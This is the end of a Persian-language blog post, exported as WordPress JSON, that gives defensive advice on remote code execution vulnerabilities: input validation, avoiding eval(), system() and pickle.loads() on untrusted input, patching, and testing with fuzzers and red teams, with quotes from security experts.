js-code-highlight\">\n<pre class=\"highlight plaintext\"><code>- Use JSON or integrity-checked formats\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 
9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<ol>\n<li><strong>\u0622\u0632\u0645\u0627\u06cc\u0634 \u0646\u0641\u0648\u0630 \u0648 \u062d\u0633\u0627\u0628\u0631\u0633\u06cc<\/strong><\/li>\n<\/ol>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight plaintext\"><code>- Simulate attacks to find weaknesses\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%D8%A8%DB%8C%D9%86%D8%B4_%D9%85%D8%AA%D8%AE%D8%B5%D8%B5\"><\/span>\n<p>  \u0628\u06cc\u0646\u0634 \u0645\u062a\u062e\u0635\u0635<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<blockquote>\n<p>&#8220;\u0627\u06a9\u062b\u0631\u06cc\u062a \u0642\u0631\u06cc\u0628 \u0628\u0647 \u0627\u062a\u0641\u0627\u0642 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0647\u0627\u06cc RCE \u06a9\u0647 \u0645\u0627 \u062f\u0631 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc 
\u0634\u0646\u0627\u062e\u062a\u0647\u200c\u0634\u062f\u0647 \u0648 \u0648\u0635\u0644\u0647\u200c\u0646\u0634\u062f\u0647 \u062f\u0631 \u062f\u0646\u06cc\u0627\u06cc \u0648\u0627\u0642\u0639\u06cc \u0645\u0634\u0627\u0647\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645. \u062a\u0627\u062e\u06cc\u0631 \u062f\u0631 \u0648\u0635\u0644\u0647\u200c\u06a9\u0631\u062f\u0646 \u062f\u0634\u0645\u0646 \u0648\u0627\u0642\u0639\u06cc \u0627\u0633\u062a.&#8221;<\/p>\n<p>&#8211; <em>\u06a9\u06cc\u062a\u06cc \u0645\u0648\u0633\u0648\u0631\u06cc<\/em>\u060c \u0628\u0646\u06cc\u0627\u0646\u06af\u0630\u0627\u0631 \u0648 \u0645\u062f\u06cc\u0631\u0639\u0627\u0645\u0644 Luta Security<\/p>\n<p>&#8220;Deserialization \u0627\u0645\u0646 \u0647\u0646\u0648\u0632 \u0628\u0631\u0627\u06cc \u062a\u0648\u0633\u0639\u0647\u200c\u062f\u0647\u0646\u062f\u06af\u0627\u0646 \u0646\u0642\u0637\u0647 \u0636\u0639\u0641 \u0627\u0633\u062a. \u0627\u06cc\u0646 \u06cc\u06a9 \u0642\u0627\u062a\u0644 \u0633\u0627\u06a9\u062a \u062f\u0631 \u0646\u0631\u0645\u200c\u0627\u0641\u0632\u0627\u0631 \u0633\u0627\u0632\u0645\u0627\u0646\u06cc \u0627\u0633\u062a.&#8221;<\/p>\n<p>&#8211; <em>\u0622\u062f\u0627\u0645 \u0634\u0648\u0633\u062a\u0627\u06a9<\/em>\u060c \u06a9\u0627\u0631\u0634\u0646\u0627\u0633 \u0645\u062f\u0644\u200c\u0633\u0627\u0632\u06cc \u062a\u0647\u062f\u06cc\u062f\u060c \u0645\u0639\u0645\u0627\u0631 \u0633\u0627\u0628\u0642 \u0627\u0645\u0646\u06cc\u062a \u0645\u0627\u06cc\u06a9\u0631\u0648\u0633\u0627\u0641\u062a<\/p>\n<\/blockquote>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%D9%BE%D8%A7%DB%8C%D8%A7%D9%86\"><\/span>\n<p>  \u067e\u0627\u06cc\u0627\u0646<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u0627\u0632 \u062a\u0632\u0631\u06cc\u0642 \u0641\u0631\u0645\u0627\u0646 \u062a\u0627 \u0622\u067e\u0644\u0648\u062f \u0646\u0627\u0627\u0645\u0646 \u0641\u0627\u06cc\u0644\u060c \u0634\u0627\u06cc\u0639\u200c\u062a\u0631\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc RCE \u0646\u0627\u0634\u06cc \u0627\u0632 \u0646\u0642\u0635\u200c\u0647\u0627\u06cc 
\u0642\u0627\u0628\u0644 \u067e\u06cc\u0634\u200c\u0628\u06cc\u0646\u06cc \u0648 \u0627\u063a\u0644\u0628 \u0642\u0627\u0628\u0644 \u067e\u06cc\u0634\u06af\u06cc\u0631\u06cc \u062f\u0631 \u0645\u0646\u0637\u0642 \u0628\u0631\u0646\u0627\u0645\u0647 \u0648 \u0628\u0647\u062f\u0627\u0634\u062a \u0627\u0645\u0646\u06cc\u062a\u06cc \u0627\u0633\u062a.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%D8%BA%D8%B0%D8%A7%DB%8C_%D8%A7%D8%B5%D9%84%DB%8C\"><\/span>\n<p>  \u0646\u06a9\u0627\u062a \u06a9\u0644\u06cc\u062f\u06cc:<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<ul>\n<li>\n<p><strong>\u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u0647\u0645\u0647 \u0648\u0631\u0648\u062f\u06cc\u200c\u0647\u0627<\/strong>\u060c \u0647\u0645\u06cc\u0634\u0647<\/p>\n<\/li>\n<li>\n<p><strong>\u0627\u0632 \u062a\u0648\u0627\u0628\u0639 \u0646\u0627\u0627\u0645\u0646 \u062e\u0648\u062f\u062f\u0627\u0631\u06cc \u06a9\u0646\u06cc\u062f<\/strong> \u0645\u0627\u0646\u0646\u062f <code>eval()<\/code>\u060c <code>system()<\/code> \u0648 <code>pickle.loads()<\/code>\u061b \u0647\u0631\u06af\u0632 \u0622\u0646\u200c\u0647\u0627 \u0631\u0627 \u0631\u0648\u06cc \u0648\u0631\u0648\u062f\u06cc \u063a\u06cc\u0631\u0642\u0627\u0628\u0644\u200c\u0627\u0639\u062a\u0645\u0627\u062f \u0628\u0647 \u06a9\u0627\u0631 \u0646\u0628\u0631\u06cc\u062f.<\/p>\n<\/li>\n<li>\n<p><strong>\u0628\u0647\u200c\u0637\u0648\u0631 \u0645\u0631\u062a\u0628 \u0648\u0635\u0644\u0647 \u06a9\u0646\u06cc\u062f<\/strong> \u2014 \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06a9\u0645\u062a\u0631 \u0634\u0646\u0627\u062e\u062a\u0647\u200c\u0634\u062f\u0647 \u0646\u06cc\u0632 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0647\u062f\u0641 \u0628\u0627\u0634\u0646\u062f.<\/p>\n<\/li>\n<li>\n<p><strong>\u0628\u0627 \u0627\u0628\u0632\u0627\u0631\u0647\u0627\u06cc \u062a\u0647\u0627\u062c\u0645\u06cc \u062a\u0633\u062a \u06a9\u0646\u06cc\u062f<\/strong> \u0645\u0627\u0646\u0646\u062f \u0641\u0627\u0632\u0631\u0647\u0627\u060c \u0622\u0646\u0627\u0644\u0627\u06cc\u0632\u0631\u0647\u0627\u06cc \u0627\u0633\u062a\u0627\u062a\u06cc\u06a9 \u0648 \u062a\u0645\u0631\u06cc\u0646\u200c\u0647\u0627\u06cc \u062a\u06cc\u0645 \u0642\u0631\u0645\u0632.<\/p>\n<\/li>\n<\/ul>\n<p>\u0645\u0627 \u0628\u0627 \u06cc\u06a9 \u0633\u0646\u0627\u0631\u06cc\u0648\u06cc \u062a\u0631\u0633\u0646\u0627\u06a9 \u0634\u0631\u0648\u0639 
\u06a9\u0631\u062f\u06cc\u0645 \u0648 \u0648\u0627\u0642\u0639\u06cc \u0627\u0633\u062a. \u0627\u0645\u0627 \u0628\u0627 \u062f\u0627\u0646\u0634 \u062f\u0631\u0633\u062a \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f <em>\u0648\u0631\u0642 \u0631\u0627 \u0639\u0644\u06cc\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0628\u0631\u06af\u0631\u062f\u0627\u0646\u06cc\u062f<\/em>.<\/p>\n<blockquote>\n<p>\u0641\u0642\u0637 <em>\u0627\u0645\u06cc\u062f\u0648\u0627\u0631 \u0646\u0628\u0627\u0634\u06cc\u062f<\/em> \u06a9\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u0634\u0645\u0627 \u0627\u0645\u0646 \u0627\u0633\u062a\u061b <strong>\u062b\u0627\u0628\u062a \u06a9\u0646\u06cc\u062f<\/strong>&#8211; \u0627\u06cc\u0646 \u0631\u0627 \u0627\u0645\u062a\u062d\u0627\u0646 \u06a9\u0646\u06cc\u062f\u060c \u0622\u0646 \u0631\u0627 \u0648\u0635\u0644\u0647 \u06a9\u0646\u06cc\u062f \u0648 \u0642\u0628\u0644 \u0627\u0632 \u0627\u06cc\u0646\u06a9\u0647 \u0634\u062e\u0635 \u062f\u06cc\u06af\u0631\u06cc \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u062f\u060c \u062e\u0648\u062f\u062a\u0627\u0646 \u0622\u0646 \u0631\u0627 \u0628\u0634\u06a9\u0646\u06cc\u062f.<\/p>\n<\/blockquote><\/div>\n","protected":false},"excerpt":{"rendered":"<p>\u0645\u0642\u062f\u0645\u0647 \u062a\u0635\u0648\u0631 \u06a9\u0646\u06cc\u062f \u06a9\u0647 \u06cc\u06a9 \u063a\u0631\u06cc\u0628\u0647 \u0642\u0627\u062f\u0631 \u0627\u0633\u062a \u0628\u062f\u0648\u0646 \u0627\u062c\u0627\u0632\u0647 \u0634\u0645\u0627 \u062f\u0631 \u067e\u0634\u062a \u0635\u0641\u062d\u0647 \u0631\u0627\u06cc\u0627\u0646\u0647 \u062e\u0648\u062f \u0628\u0646\u0634\u06cc\u0646\u062f. \u0627\u06cc\u0646 \u0648\u0627\u0642\u0639\u06cc\u062a \u0648\u062d\u0634\u062a\u0646\u0627\u06a9 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 (RCE) \u0627\u0633\u062a. 
\u062f\u0631 \u0633\u0627\u0644\u0647\u0627\u06cc \u0627\u062e\u06cc\u0631 \u060c \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u0647\u0627\u06cc \u0645\u0647\u0645 \u060c \u0627\u0632 \u062c\u0645\u0644\u0647 \u0634\u0631\u06a9\u062a \u0647\u0627\u06cc \u0628\u0631\u062a\u0631 \u0648 \u0633\u06cc\u0633\u062a\u0645 \u0647\u0627\u06cc \u062f\u0648\u0644\u062a\u06cc \u060c \u0642\u0631\u0628\u0627\u0646\u06cc \u062d\u0645\u0644\u0627\u062a \u0633\u0627\u06a9\u062a \u0648 \u062f\u0631 \u0639\u06cc\u0646 \u062d\u0627\u0644 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":105173,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/media2.dev.to\/dynamic\/image\/width=1000,height=500,fit=cover,gravity=auto,format=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcm3gddv2db03pluk4a9q.png","fifu_image_alt":"","footnotes":""},"categories":[339],"tags":[],"class_list":["post-105172","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-dev"],"_links":{"self":[{"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/posts\/105172","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/comments?post=105172"}],"version-history":[{"count":0,"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/posts\/105172\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/media\/105173"}],"wp:attachment":[{"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/media?parent=105172"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:
\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/categories?post=105172"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/tags?post=105172"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}